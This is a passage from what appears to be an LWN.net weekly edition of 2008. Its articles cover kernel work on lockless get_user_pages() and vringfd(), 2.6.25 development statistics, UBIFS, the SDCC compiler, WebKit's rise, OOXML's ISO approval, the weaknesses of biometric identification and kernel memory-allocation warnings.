mm-&gt;mmap_sem.  If two processes are performing direct I/O on
within the same address space - a common scenario for large database
management systems - they will contend for that semaphore.  This kind of
lock contention quickly kills scalability; as soon as processors have to
wait for each other, there is little to be gained by adding more of them. 


There are two common approaches to take when faced with this sort of
scalability problem.  One is to go with more fine-grained locking, where each
lock covers a smaller part of the kernel.  Splitting up locks has been
happening since the initial creation of the Big Kernel Lock, which is the
definitive example of coarse-grained locking.  There are limits to how much
fine-grained locking can help, though, and the addition of more locks comes
at the cost of more complexity and more opportunities to create deadlocks.


The other approach is to do away with locking altogether; this has been the
preferred way of improving scalability in recent years.  That is, for
example, what all of the work around read-copy-update has been doing.  And
this is the direction Nick has chosen to improve get_user_pages().


Nick's core observation is that, when get_user_pages() is called
on a normal user-space page which is already present in memory, that page's
reference count can be increased without needing to hold any locks first.
As it happens, this is the most common use case.  Behind that observation,
though, are a few conditions.  One is that it is not possible to traverse
the page tables if those tables are being modified at the same time.  To be
guaranteed that this will not happen, the kernel must, before heading into
the page table tree, disable interrupts in the current processor.  Even
then, the kernel can only traverse the currently-running process's page
tables without holding mmap_sem.


Lockless operation also will not work whenever pages which are not "normal"
are involved.  Some cases - non-present pages, for example - are easily
detected from the information found in the page tables themselves.  But
others, such as situations where the relevant part of the address space has
been mapped onto device memory with mmap(), are not readily
apparent by looking at the associated page table entries.  In this case,
the kernel must look back at the controlling vm_area_struct (VMA)
structure to see what is going on - and that cannot be done without holding
mmap_sem.  So it looks like there is no way to find out whether
lockless operation is possible without first taking the lock.


The solution here is to grab a free bit in the page table entry.  The PTE
for a page which is present in memory holds the physical page frame
address.  In such addresses, the bottom 12 bits (for architectures using
4096-byte pages) will always be zero, so they can be dedicated to other
purposes.  One of them is used to indicate whether the page is present in
memory at all; others indicate writability, whether it's a user-space page,
whether it is dirty, etc.  Nick's patch grabs one of the few remaining bits
and calls it "PAGE_BIT_SPECIAL," indicating "special" pages.
These are pages which, for whatever reason, do not have a
readily-accessible struct page associated with them.  Marking
"special" pages in the page tables can help in a number of places; one of
those is making it possible to determine whether lockless
get_user_pages() is possible on a given page.


Once these pages are properly marked in the page tables, it is possible
to write a function which makes a good attempt at a lockless
get_user_pages().  Nick's proposal is called
fast_gup():


This function has a much simpler interface than get_user_pages()
because it does not handle many of the cases that get_user_pages()
can deal with.  It only works with the current process's address space, and
it cannot return pointers to VMA structures.  But it can iterate
through a set of page tables, testing each page for presence, writability,
and "non-specialness," and incrementing each page's reference count (thus
pinning it into physical memory) in the process.  If it works, it's very
fast.  If not, it undoes things then falls back to
get_user_pages() to do things the slow, old-fashioned way. 
 

How much is this worth?  Nick claims a 10% performance improvement running
"an OLTP workload" (one of those unnameable benchmark suites, perhaps) using
IBM's DB2 DBMS system on a two-processor (eight-core) system.  The
performance improvement, he says, may be greater on larger systems.  But
even if it remains at "only" 10%, this work is a clear step in the right
direction for this kind of workload.


[Update: this interface was merged for the 2.6.27 kernel; the name
was changed to get_user_pages_fast() but it is otherwise the
same.]

		Where 2.6.25 came from


The Linux Foundation has just published a
white paper, written by Greg Kroah-Hartman, Amanda McPherson, and your
editor, reviewing the origins of the code merged into the kernel from
2.6.11 through 2.6.24.  As LWN readers know, the 2.6.25 kernel is
getting close to release.  So this seems like as good a time as any to look
at what happened with the process in this release cycle.

As of this writing, 12,269 individual changesets have been merged for
2.6.25 - a new record.  That beats the previous record (2.6.24, with a mere
10,353 changesets) by almost 2,000.  There were 1,174 individual developers
involved with 2.6.25, 419 of whom contributed one single patch.  All told,
those developers worked for 159 employers (that your editor could
identify).  The changes added 766,979 lines of code and removed 399,791, for
a total growth of 367,188 lines.

Here is an updated version of a plot that your editor has been fond of
showing during talks in recent years:


This plot shows a cumulative count of lines changed over time, with kernel
release dates added in.  The effects of the merge window policy can be seen
in the stair-step appearance of the plot.  The steps appear to be getting
bigger, but the time between releases has also increased slightly, so the
overall rate of change remains roughly constant.  It is a high rate, with
over five million lines changed - well over half the total - in the last
two years.

So who did this work?  Here is the traditional table of the most active
developers in the 2.6.25 series:


There are some familiar names on this list, but also some new ones.
Bartlomiej Zolnierkiewicz contributed more changesets than any other
developer; his work is contained entirely within the IDE subsystem.
Patrick McHardy works in the networking area, mostly (but not exclusively)
with the netfilter subsystem.  Adrian Bunk continues to make small fixes
all over the tree and to relentlessly hunt down unused code for removal.
Ingo Molnar remains busy in his new role as one of the x86 maintainers;
scheduler work also accounts for a number of his changes.  Paul Mundt
maintains the SuperH architecture.

The picture is a little different when one considers how many lines of code
were changed.  Jesper Nillson's work was done within the CRIS
architecture.  David Howells works all over the tree; his largest
contribution was the addition of the MN10300 architecture code.  Eliezer
Tamir contributed the bnx2x (Broadcom Everest) network driver, and Kumar
Gala works with the PowerPC architecture.


There is relatively little change in the lists of employers associated with
all of this work (please remember that the numbers associated with
employers are necessarily approximate):


As usual, one can also look at who applies a Signed-off-by header to code
for which they are not the author.  These headers illustrate the chain of
trust which gets code into the kernel.  For 2.6.25, the top approvers of
patches are:


Some of these developers are quite busy; Andrew Morton is signing off
more than twenty patches every day - weekends included.  The gatekeepers to
the kernel continue to work for a relatively small number of companies,
with the top ten employers accounting for over 75% of all non-author
signoffs. 

All told, all these numbers paint a picture of a development process which
is healthy and continues to set a fast pace.  It incorporates work from an
increasingly large community of developers who are able to work in a highly
cooperative manner despite the fact that their employers are fierce
competitors.  There are very few projects like it.

(Thanks  to Greg Kroah-Hartman for his help in the creation of these
statistics).

		UBIFS


The steady growth in flash-based memory devices looks set to transform
parts of the storage industry.  Flash has a number of advantages over
rotating magnetic storage: it is smaller, has no moving parts, requires
less power, makes less noise, is truly random access, and it has the
potential to be faster. 
But flash is not without its own idiosyncrasies.  Flash-based devices
operate on much larger blocks of data: 32KB or more.  Rewriting a portion
of a block requires running an erase cycle on the entire block (which can
be quite slow) and writing the entire block's contents.  There is a limit
to the number of times a block can be erased before it begins to corrupt
the data stored there; that limit is low enough that it can bring a
premature end to a flash-based device's life, especially if the same block
is repeatedly rewritten.  And so on.


A number of approaches exist for making flash-based devices work well.
Many devices, such as USB drives, include a software "flash translation
layer" (FTL); this layer performs the necessary impedance matching to make
a flash device look like an ordinary block device with small sectors.
Internally, the FTL maintains a mapping between logical blocks and physical
erase blocks which allows it to perform wear leveling - distributing
rewrite operations across the device so that no specific erase block wears
out before its time - though some observers question whether low-end flash
devices bother to do that.  The use of FTL layers makes life easy for the rest of
the system, but it is not necessarily the way to get the best performance
out of the hardware.


If you can get to the device directly, without an FTL getting in the way,
it is possible to create filesystems which embody an awareness of how flash
works.  Most of our contemporary filesystems are designed around rotating
storage, with the result that they work hard to minimize time-consuming
operations like head seeks.  A flash-based filesystem need not worry about
such issues, but it must be concerned about things like erase blocks
instead.  So making the best use of flash requires a filesystem written
with flash in mind.


The main filesystem for flash-based devices on Linux is the venerable
JFFS2.  This filesystem works, but it was designed for devices which are
rather smaller than those available today.  Since JFFS2 must do things like
rebuild the entire directory tree at mount time, it can be quite slow on
large devices - for relatively small values of "large" by 2008 standards.
JFFS2 is widely seen as reaching the end of its time.


A more contemporary alternative is LogFS, which has been discussed on these pages in the
past.  This work remains unfinished, though, and development has been
relatively slow in recent times; LogFS has not yet been seriously
considered for merging into the mainline.  A more recent contender is UBIFS; this code is in a state
of relative completion and its developers are asking for serious review.


UBIFS depends on the UBI layer, which was merged for 2.6.22.  UBI
("unsorted block images") is not, technically, an FTL, but it performs a
number of the same functions.  At the heart of UBI is a translation table
which maps logical erase blocks (LEBs) onto physical erase blocks (PEBs).
So software using UBI to access flash sees a device providing a simple set
of sequential blocks which apparently do not move.  In fact, when an LEB is
rewritten, the new data will be placed into a different location on the
physical device, but the upper layers know nothing about it.  So UBI makes
problems like wear leveling and bad block avoidance go away for the upper
layers.  UBI also takes care of running time-consuming erase operations in
the background when possible so that upper layers need not wait when
writing a block.


One little problem with UBI is that the logical-to-physical mapping
information is stored in the header of each erase block.  So when the UBI
layer initializes a flash device, it must read the header from every block
to build the mapping table in memory; this operation clearly takes time.
For 1GB flash devices, this initialization overhead is tolerable; in the
future, when we'll be booting our laptops with terabyte-sized flash drives
in them, the linear scan will be a problem.  The UBIFS developers are aware
of this issue, but believe that it can be solved at the UBI level without
affecting the higher-level filesystem code.


By using UBI, the UBIFS developers are able to stop worrying about some
aspects of flash-based filesystem design.  Other problems remain, though.
For example, the large erase blocks provided by flash devices require
filesystems to track data at the sub-block level and to perform occasional
garbage collection: coalescing useful information into new blocks so that
the remaining "dead" space can be reclaimed.  Garbage collection, along
with the
potential for blocks to turn bad, makes space management on flash
devices tricky: freeing space may require using more space first, and there
is no way to know how much space will actually become available until the
work has been done.


In the case of UBIFS, space management is an even trickier problem for a
couple of reasons.  One is that, like a number of other flash filesystems,
UBIFS performs transparent compression of the data.  The other is that,
unlike JFFS2, UBIFS provides full writeback support, allowing data to be
cached in memory for some time before being written to the physical media.
Writeback gives large performance improvements and reduces wear on the
device, but it can lead to big trouble if the filesystem commits to writing
back more data than it actually has the space to store.  To deal with this
problem, UBIFS includes a complex "budgeting" layer which manages
outstanding writes with pessimistic assumptions on what will be possible.


Like LogFS, UBIFS uses a "wandering tree" structure to percolate changes up
through the filesystem in an atomic manner.  UBIFS also uses a journal,
though, to minimize the number of rewrites to the upper-level nodes in the
tree. 


The latest UBIFS posting raised questions about how it compares with
LogFS.  The resulting discussion was ... not entirely technical, but a few
clear points came out.  UBIFS is in a more complete state and appears to
perform quite a bit better at this time.  LogFS is a lot less code, avoids
the boot-time linear scan of the device, and is able to work (with some
flash awareness) through an FTL.  Which is better is not a question your
editor is prepared to answer at this time; what does seem clear is that the
growing competition between the two projects has the potential to inspire
big improvements on both sides in the near future.

		SDCC, the Small Device C Compiler


SDCC
is a multi-platform, multi-target C cross compiler that was
originally written by Sandeep Dutta and has been further improved by
a number of
other people:


SDCC is a retargetable, optimizing ANSI - C compiler that targets the Intel 8051, Maxim 80DS390, Zilog Z80 and the Motorola 68HC08 based MCUs. Work is in progress on supporting the Microchip PIC16 and PIC18 series. SDCC is Free Open Source Software, distributed under GNU General Public License (GPL). Some of the features include:


ASXXXX and ASLINK, a Freeware, retargetable assembler and linker.
 extensive MCU specific language extensions, allowing effective use of the underlying hardware.
 a host of standard optimizations such as global sub expression elimination, loop optimizations (loop invariant, strength reduction of induction variables and loop reversing ), constant folding and propagation, copy propagation, dead code elimination and jump tables for 'switch' statements. 
 MCU specific optimizations, including a global register allocator.
 adaptable MCU specific backend that should be well suited for other 8 bit MCUs
 independent rule based peep hole optimizer.
 a full range of data types: char (8 bits, 1 byte), short (16 bits, 2 bytes), int (16 bits, 2 bytes), long (32 bit, 4 bytes) and float (4 byte IEEE).
 the ability to add inline assembler code anywhere in a function.
 the ability to report on the complexity of a function to help decide what should be re-written in assembler.
 a good selection of automated regression tests.


The SDCC package

components include the sdcc compiler, the sdcpp C preprocessor,
assemblers and linkers for the supported target processors,
a simulator for the 8051 processor, the sdcdb source debugger
and the packihx Intel hex file packing tool.


Version 2.8.0 of SDCC was
announced
on March 30, 2008, it includes the following changes:


Your author

downloaded SDCC 2.8.0 as a .tar.bz2 file onto a machine running
Ubuntu 7.04 "Feisty Fawn".
The file was uncompressed, and untared.  The configure script
was run and one package dependency issue was resolved by installing
flex.
The second run of configure worked, as did the make
and make install steps.
Running sdcc -v produced the expected result:
SDCC : mcs51/gbz80/z80/avr/ds390/pic16/pic14/TININative/xa51/ds400/hc08 2.8.0 #5117 (Apr  1 2008) (UNIX).


A few

test cases were compiled and assembled using the default MCS51 target,
then using the -mz80 switch to produce output for a
Z80 processor.  All of the tests seemed to work, and produced
readable Intel Hex files that appear to be suitable for movement
to a development platform.  Your author recognized
the hex C30001 at the beginning of the code as a Z80 jump instruction,
activate the wayback machine.
This may be a long way from developing a working embedded application
on real hardware using SDCC, it does show that the system builds
and is stable enough to consider using as a development platform.


The Z80
and mcs51
microprocessors have been around since the
late 1970s, newer versions are still being produced.
The Microchip

PIC microcontroller family and the Atmel
AVR
family are currently very popular microcontroller platforms.
The AVR is the processor used in the recently
featured Arduino
open hardware microprocessor design, although that uses a
different development system.


SDCC allows microprocessor applications to be written in C,
and that greatly expands the range of problems that can be
solved by small embedded machines.  The field of C cross-compilers
has traditionally been dominated by proprietary Windows-based
software.  SDCC allows one to develop embedded microprocessor
designs using open-source software under Linux.


		WebKit rising


Once upon a time, there were no usable free web browsers for the Linux
environment; the binary-only Netscape releases were all that was available
to us.
For many, the solution to the problem was to be found in the release of the
Netscape source code; some years later, we got the Mozilla and Firefox
browsers (based on the Gecko rendering engine) from this work.  The KDE
project, though, took a different route in the late 1990's, developing the
KHTML renderer to use with the Konqueror application.


A few years later, Apple surprised the world by selecting KHTML as the base
for its Safari browser, despite the fact that Gecko was more widely
deployed.  What followed was essentially a fork of KHTML and some bad blood
between Apple and the KDE project.  Over time, the two sides have come to a
better understanding, but KHTML and Apple's version (WebKit) have remained separate.  The
existence of two KHTML forks may not last that much longer, though, and
some interesting things appear to be happening.


One of those things is that Konqueror is slowly being moved over to WebKit
as its rendering engine.  The decision to go in this direction was made at
the 2007 Akademy gathering, and work has been proceeding ever since.
Current Ubuntu development releases include a preview version of Konqueror
on WebKit.  Work can be expected to continue in this direction, with the
result that KHTML will slowly lose its prominence in the KDE project.  The
fork, in other words, is beginning to join, with the resulting software
being called "WebKit." [Update: as can be seen in the comments, this
paragraph overstated the case somewhat.  Things might end up as
described here, but that is not the case now.]


Meanwhile, it seems that people are actually starting to use Safari, to the
point that web designers are thinking that they should actually test their
sites with it.  For what it's worth, Safari currently accounts for just
over 3% of visits to LWN.net - relatively small compared to Firefox (over
60%), but, when added to Konqueror's 4.5%, it makes half of Internet
Explorer's 15% share.  One can argue that the mix of browsers used by LWN
readers is not typical of the net as a whole, but, even so, it looks like
WebKit-based browsers just might become a 
significant part of the Internet's software base.


[PULL QUOTE: 
When a GNOME project announces, on April 1, that it is moving over to a
major component which came from the KDE camp, one can be forgiven for not
taking it seriously.
 END QUOTE]


The story does not stop there, though.
When a GNOME project announces, on April 1, that it is moving over to a
major component which came from the KDE camp, one can be forgiven for not
taking it seriously.  But it would appear that this announcement from the Epiphany
developers, saying
that they are moving to WebKit as their sole rendering engine, is the real
thing.  Epiphany, remember, is 
the closest thing that GNOME has to an official web browser; it has users
who swear by its better integration with the GNOME desktop.  But Epiphany
has always been based on the Gecko engine, and it seems that not a whole
lot of users have seen reasons to stick with it over Firefox, which
provides rather more functionality on the same engine.  Epiphany is not a
big force in the browser arena currently.


Last year, the Epiphany developers added an abstraction layer which allowed
the browser to operate over multiple rendering engines, including WebKit.
Now they have decided to take that layer back out and to support just one
rendering engine: WebKit.  The development team cites a number of reasons
for moving away from Gecko, including release-cycle mismatches, a feature
set which is driven by a competing project, and a lack of attention being
paid to the Gecko/GTK embedding API.  Gecko, they have decided, is not the
best fit for Epiphany.


WebKit, instead, was designed for embedding - the WebKit project's goals explicitly
rule out building a browser themselves - and the GNOME
API is said to work very nicely.  WebKit in GNOME uses technologies like
Cairo and Pango, like many other GNOME applications.  Overall, the Epiphany
team feels like WebKit is a better match for what they are trying to do -
and they suggest that a number of other GNOME projects move in that
direction as well.  The initial response from other GNOME participants
appears to be positive, with the exception of some concerns about
accessibility support in WebKit - concerns which, presumably, can be
addressed. 


The GNOME/KDE flame wars, happily, are some years behind us.  Developers
from both projects are more interested in cooperation these days, but, so
far, much of that cooperation has been around relatively small, low-level
components.  An HTML rendering engine is not a small, low-level component,
though.  If both projects seriously work toward the improvement of WebKit,
they will have started an era of rather higher cooperation than has been
seen in the past.  If this cooperation holds together, it can only be to
the benefit of both projects, and to all other users of WebKit as well.


The Gecko engine is good code and a highly successful project.  But it is
also controlled by a company (Mozilla Corporation) whose agenda, beneficial
though it may be, does not include the creation of successful competing
browsers.  So it's not entirely surprising that Gecko has not proved to be
entirely suitable for groups trying to create those competing browsers.
WebKit, at the outset, looks like it is better suited to this task.  The
WebKit project has expressed interest in
working with GNOME; there might just be a productive partnership in the
making here.


But it's worth remembering that WebKit, too, is a project developed by a
company with its own objectives, few of which make any mention of turning
2009 into the real year of the Linux desktop.  For now, though,
WebKit has the look of a project with all the right attributes: real
independence, merit-based access to the source repository, no requirement
for copyright assignments, reasonable licensing, and the right goals.  It
may well be positioned to become a core component in the Linux desktop.

		OOXML gets ISO approval


 The votes are
in, with Microsoft's Office Open XML (OOXML) format gaining
international standard status.  Both Microsoft
and Ecma
International jumped the gun a bit by proclaiming victory a day before
the official announcement, but the writing was on the wall since the
balloting closed on March 29.  There are now two competing standards for
office document formats that have been approved by the International
Organization for Standardization (ISO): OOXML and Open Document Format
(ODF).  

The most recent vote was an opportunity for the national bodies to
change their vote from September based on the outcome of the Ballot
Resolution Meeting (BRM).  The September vote was relatively close but
OOXML did not pass, which led Ecma and Microsoft to try and address the
3,500 comments (1,000+ after eliminating duplicates) made by participating
countries.  The comments and the Microsoft/Ecma solutions to them were
discussed during the five-day BRM meeting in Geneva in
late February. 


When the BRM was announced, many wondered how that number of comments could be handled
in a week-long meeting, unfortunately the answer is: not very well.  There
was simply too much to cover, so the majority of comments—mostly substantive
issues with OOXML—didn't get discussed and were voted on en
masse.  The majority of participants abstained (18) or failed to vote (4), with six
voting to accept the changes proposed by Microsoft/Ecma and four voting
against.  This allowed the BRM process to complete, leaving it up to the
national bodies to decide whether to change their September votes.


The outcome
was again fairly close, but a net change of seven votes from
"disapprove" to "approve" moved OOXML into approval.  24 of 32 votes from
Participating countries were for approval, which is beyond the
two-thirds majority required.  Also, 86% of the Observing countries voted
to approve, which is above the 75% required.  In both cases, abstentions
are not counted.


At some level, the outcome should not be surprising.  Microsoft put a huge
effort into ensuring OOXML standardization.  Some would claim that they
"gamed" the system—it's pretty clear they did—what's less clear
is why, and what they plan to do next.  Their tactics have been questionable,
which leads many to believe they have an ulterior motive.


To start with, Ecma International essentially rubber-stamped a
"specification" that Microsoft presented as ECMA-376.
Then it was introduced to ISO on the "fast-track" process, which is meant
for mature standards that have few gray areas or controversial parts.
Whatever else can be said of OOXML, nearly anyone that is not firmly in the
Microsoft camp can see that it is in no way mature, clear, or
non-controversial—it is flawed at multiple levels.


One of the most puzzling things about the process is how we have ended up
with two standards.  In general, standards are supposed to be, well,
standard, allowing multiple implementations that use the standard,
but innovate in other areas.  HTML and HTTP are standards, whereas Firefox, Safari,
Konqueror, Opera, and Internet Explorer all implement those
standards—some more faithfully than others—but
provide different sets of features on top.  Microsoft's argument for
multiple standards is a
disingenuous one: choice.


It would seem that Microsoft wants to paint this as a VHS vs. Betamax
battle, where the consumer is able to choose the one best suited for their
needs.  But, both of the video recording standards were proprietary, with
many arguing that the technically inferior choice "won".  Microsoft is, of
course, no stranger to having its choices—again arguably technically
inferior and generally pushed through its near-monopoly on the desktop—come out on top.


One might be able to argue that competition between the standards is
consumer-friendly if there is a level playing field.  In order for that to
happen, Microsoft would have to implement and deploy the competitive
standard—something it has clearly said it will not do.  It is hard to
see how customers are going to be able to determine which of the two
formats is "better" when most of them will only be given one choice.


Many also fear that free software (and other non-Microsoft proprietary)
implementations of the standard will not be fully interoperable with the de
facto standard because of specification inadequacies or patents.  Many, including ODF editor Patrick Durusau
have called for OOXML to be passed so that it can be clarified.  Setting
aside the obvious cart-before-the-horse problem, standards bodies are
notoriously slow—it has been more than a year for the fast-track
approval of OOXML for example—expecting that clarifications can be
made through that process is somewhat alarming.  More likely, changes will
be made in the format emitted by various Microsoft products and then
shoehorned into the standard some months or years later.


The claim that billions of documents exist in OOXML, which leads many to
believe it should be adopted, is particularly galling to many.  There is no
OOXML standard yet—the final document has not yet been produced—but
that is a minor issue.  The fact is that even though a form of OOXML is
available in recent Microsoft products, it is not the default and most
documents have not been stored using it.  The billions of documents are
mostly stored in various versions of the proprietary DOC format that non-Microsoft users have
been struggling to read for years.


The opponents of OOXML had their own share of misbehavior during this
process.  It is pretty unlikely that everyone who favored OOXML passage is
in the pay of Microsoft, for example.  The doom and gloom predictions of
what will happen have sometimes been over the top as well.  Free software
is not about restricting choices—if folks want to store
documents in OOXML, that is their decision.


So, what will happen to ODF?  To many it looks like a truly vendor-neutral
standard—warts and all—will be shoved aside by a truly
vendor-specific one.  Andy Updegrove, who has followed this process closely
and fairly objectively in his weblog, sees
things a bit differently.  There is still a long way to go before OOXML
supplants ODF, if it ever does, according to Updegrove:

That answer is this:  if anyone had asked me to predict in August of 2005
(the date of the initial Massachusetts decision that set the ODF ball
rolling) how far ODF might go and what impact it might have, I would never
have guessed that it would have gone so far, and had such impact, in so
short a period of time.  I think it's safe to say that whatever happens
with the OOXML vote is likely to have little true impact at all on the
future success of ODF compliant products.  


It is possible that Microsoft is changing its ways, but longtime Microsoft
watchers, especially those who have been harmed by their tactics in the
past, remain skeptical.  One would guess Microsoft will be on its best
behavior for the next two months while objections to the approval can still
be raised.  After that, we will see—over time—whether this is
yet another lock-in play or whether they wish to play fair in the
document storage arena.  Every move they make will be closely scrutinized; there
are risks to reverting to their previous behaviors.  But, if we end up with a
truly open standard, free of patent nonsense, and implementable by all, it
doesn't really matter whether it is OOXML or ODF.  


		Biometrics for identification


Using a fingerprint or other physical characteristic, called biometric data, for
identity verification seems, at first glance, like a perfect solution to
the problem.  Unfortunately, there are some basic problems with using biometric
information that way.  If the biometric data can be gathered by others, it no
longer makes such a good identifier.


As part of a political protest against including fingerprints in passports,
the Chaos Computer Club (CCC)
published a
fingerprint of German Home Secretary Wolfgang Schäuble.  Schäuble
is a supporter of collecting fingerprint data to combat terrorism.  The club not
only published the picture, but also a film that can be placed over a
finger to deceive fingerprint scanners.  A club spokesman has usage
recommendations as reported in heise online: 

We recommend that you use the film whenever your fingerprint is taken,
such as when you enter the US, stop over at Heathrow, or even when you
touch bottles at your local super market -- just to be on the safe side

  It seems unlikely that CCC's distributed finger film will
actually leave the Secretary's print on a glass surface, but more
sophisticated versions of the same basic idea should be able to.
Various folks have shown that using an image of someone's fingerprint can
fool most scanners.  Even sophisticated scanners can be spoofed when that
image is placed over a live finger—with body temperature and pulse.
The problem is that while a fingerprint is unique, it isn't secret.  CCC
got theirs from a sympathizer who picked it up from a glass used by the Secretary
during a speech.


Bruce Schneier is, as usual, ahead of the curve on this.  In an article
from nearly ten years ago, he drives home the point:

The moral is that biometrics work great only if the verifier can verify two
things: one, that the biometric came from the person at the time of
verification, and two, that the biometric matches the master biometric on
file. If the system can't do that, it can't work. Biometrics are unique
identifiers, but they are not secrets. (Repeat that sentence until it sinks
in.) 


Other forms of biometric identification exist, but are susceptible to the
same kinds of problems.  A voiceprint or facial identification scanner
could be fairly easily subverted by secretly recording or photographing the
subject.  Retinal scans are trickier, perhaps, but technology to remotely
(and surreptitiously) read them will probably come along.  In many cases,
an attacker may not even need to go to that amount of trouble because they
can just extract—or pay to have someone else extract—that
information from some database.


More and more of this kind of information is being gathered and
centralized.  The US has started fingerprinting all ten fingers of non-citizens
who enter the country—other countries have started doing it in
retaliation.  One could hope the data retention policy for that information
is similar to that of White House emails, but it is probably longer.
Worse yet, it is probably stored with photographs, passport information,
and signature of the subject.


The key to using biometrics correctly is to repeat the Schneier mantra:

Biometrics are powerful and useful, but they are not keys. They are useful
in situations where there is a trusted path from the reader to the
verifier; in those cases all you need is a unique identifier. They are not
useful when you need the characteristics of a key: secrecy, randomness, the
ability to update or destroy. Biometrics are unique identifiers, but they
are not secrets. 


Revocation of a biometric identifier is difficult or impossible—if it
is even known to be compromised.  One could potentially switch fingers for
fingerprint identification, or even switch eyes—once.  Switching
voiceprint, face, or DNA if and when that gets used, will be essentially
impossible.  Biometrics suffer from the same failure mode as using the same
password everywhere, unless you can somehow use a different characteristic
for each biometrically "protected" dataset—hard to do with limited
body parts.


Biometric data does have its uses, but it has limitations as well.  It
seems seductively simple that your fingerprint is the same as you, but it
isn't necessarily true.  Now we just need to teach the politicians, which
might be something that Schäuble is starting to learn.


		Memory allocation failures and scary warnings


People who put their Linux systems under a certain amount of memory stress
- and who look at their logfiles - may notice an occasional message
indicating that a "page allocation failure" has occurred,
followed by a scary backtrace.  These people may also notice that,
despite the apocalyptic appearance of this message, the world often fails
to end.  In fact, the system tends to carry on just fine.  For this reason,
Dave Jones, who probably gets ten emails for every backtrace generated on a
Fedora system, has suggested that these
messages are simply noise which should be removed.  Whether that should
really happen is not entirely clear, though; understanding why requires a
bit of background.


In general, the kernel's memory allocator does not like to fail.  So, when
kernel code requests memory, the memory management code will work hard to
satisfy the request.  If this work involves pushing other pages out to swap
or removing data from the page cache, so be it.  A big exception happens,
though, when an atomic allocation (using the GFP_ATOMIC flag) is
requested.  Code requesting atomic allocations is generally not in a
position where it can wait around for a lot of memory housecleaning work;
in particular, such code cannot sleep.  So if the memory manager is unable
to satisfy an atomic allocation with the memory it has in hand, it has no
choice except to fail the request.


Such failures are quite rare, especially when single pages are
requested.  The kernel works to keep some spare pages around at all times,
so the memory stress must be severe before a single-page allocation will
fail.  Multi-page allocations are harder, though; the kernel's memory
management code tends to fragment pages, making groups of
physically-contiguous pages hard to find.  In particular, if the system is
under pressure to the point that there is not much free memory available at
all, the chances of successfully allocating two (or more) contiguous pages
drops considerably.


Multi-page allocations are not often used in the kernel; they are avoided
whenever possible.  There are situations where they are necessary,
though.  One example is network drivers which (1) support the
transmission and reception of packets too large to fit into a single page,
and which (2) drive hardware which cannot perform scatter/gather I/O
on a single packet.  In this situation, the DMA buffers used for packets
must be larger than one page, and they must be physically contiguous.  This
is a situation which will become less 
pressing over time; scatter/gather capability in the hardware is
increasingly common, and drivers are being rewritten to make use of this
capability.  With sufficiently smart hardware, the need for multi-page
allocations goes down considerably.


But all of that skirts around the main point, which is that kernel code is
supposed to handle allocation failures properly.  There is never any
guarantee that memory will be available, so kernel code must be written
defensively.  Allocation failures must be handled without losing any
more capability than is strictly necessary.  If one assumes that kernel
code is written correctly, there should be no need to issue warnings on
allocation failures.  Things should just continue to work, perhaps without
users noticing at all.


And, in fact, things often do just work.  But the discussion resulting from
Dave's suggestion makes it clear that few developers are confident that all
kernel code does the right thing in the face of memory allocation
problems.  In cases where an allocation failure is not dealt with
correctly, the system may go down in random places, leaving few clues as to
what really happened.  In that kind of situation, the allocation failure
warning may be the only useful information which survives the crash.  For
this reason, some people want to see the warnings left in place.


As it happens, the memory allocator supports a special bit
(__GFP_NOWARN) which causes the warning not to be emitted if a
specific allocation fails.  So it has been suggested that the allocations
made from code which is known to handle failures properly have __GFP_NOWARN
set.  That would kill the warnings in code known to do the right thing
while leaving it for all other callers, presumably limiting the warnings to
places where there might truly be a problem.  Jeff Garzik strongly opposed this idea, though, saying
that it clutters up the code and "punishes good behavior."


The other reason given for keeping the warnings in place is to make it
clear when a system is running under persistent memory pressure.  Such
systems will not be performing optimally; often there are changes which can
be made to relieve the pressure and help the system to run more smoothly.
So it has been suggested that the warning could be reduced in frequency and
made less scary.  Nick Piggin suggests:


	So I think that the messages should stay, and they should print out
	some header to say that it is only a warning and if not happening
	too often then it is not a problem, and if it is continually
	happening then please try X or Y or post a message to lkml...


An alternative idea would be to keep some sort of counter somewhere which
could be queried by curious system administrators.

Of course, the real solution is to ensure that all kernel code is
robust in the face of allocation failures.  This can be hard to do, since
the error recovery paths in any code are not often exercised or tested.
Fortunately, the fault injection
framework can help in this situation.  Kernel developers can use this
framework to simulate allocation failures in specific regions of code, then
watch to see what happens.  Your editor's impression, though, is that
relatively few developers are using this tool.  So confidence in the
kernel's handling of allocation failures may remain low, and the desire to
keep the warning around may remain high.

		vringfd()


<!-- LWNNoRightSideAd -->One of the core features of the (now stalled) kevent subsystem was a
circular buffer intended for efficient movement of data between the kernel
and user space.  Kevent may have run out of steam, but the ring buffer idea
is back via a different path.  Rusty Russell is now proposing a new system call
(called vringfd()) which turns some of the virtio work into a new
kernel-to-user ring buffer interface.  The submitted patch is breathtaking
in its lack of documentation on this new system call, especially
considering that its author is quite good with that sort of writing.

Your editor has
taken this omission as a personal challenge and, as a result, has set about
reverse engineering the (somewhat complex) vringfd() interface.


A user-space process which wishes to set up a vring for communication with
the kernel must create a slightly complicated data structure first.  One
starts by deciding how many entries the ring should have; this number must
be a power of two which fits into an unsigned, 16-bit value.  Given this
number (we'll call it RING_SIZE), the data structure looks like
this:


The page alignment for the used array is important - that array
might be mapped separately into kernel space.  The array must fit into a
single page, which puts a practical limit of 256 entries for
RING_SIZE on systems with 4096-byte pages.  If this API goes
forward, chances are good that a way will be found to raise this limit.

Individual descriptors in the ring are described with this structure:


For a simple buffer, the application would simply point addr at
the beginning and set len to the appropriate value.  If the buffer
is to be written to by the kernel, the application should also set
VRING_DESC_F_WRITE in the flags field.

Things can get more complicated than that, though, in that the
vringfd() interface supports multipart scatter/gather buffers.  To
set up such a buffer, user space would use one vring_desc entry
for each segment of the buffer.  For all but the final segment, the
VRING_DESC_F_NEXT flag (saying "use the next descriptor too")
should be set, and next should be the index of the next
descriptor.  When the kernel grabs a buffer, it will follow the chain and
use all segments found until the final one (which lacks the
VRING_DESC_F_NEXT flag) is encountered.

Before the kernel will use buffers set up by the application, though, user
space must indicate that the buffer is ready.  That is done through the
vring_avail structure:


The ring array holds indexes into the descriptors array.
The idx field should always be the index of the last valid entry
in ring.  When a new buffer is ready for transfer to or from the
kernel, the application will store the index of the first descriptor into
ring[idx+1], then increment idx.  When the ring is first
established, the kernel remembers the position of idx, so the
first buffer should be added here after the vringfd()
system call is made.

The kernel will consume buffers from the available ring as
needed.  Once the requested operation has been performed on the buffer and
the kernel is done with it, the buffer will show up in the used
area, which is structured this way:


In the vring_used structure, idx is the index of the next
entry in ring which may be written by the kernel; it will be
incremented after the ring is updated.  When a buffer is placed in the used
ring, the id field will be the index of the descriptor, and
len will be the actual length of the data transferred.

Note that the flags fields in the vring_avail and
vring_used structures appear to be unused.


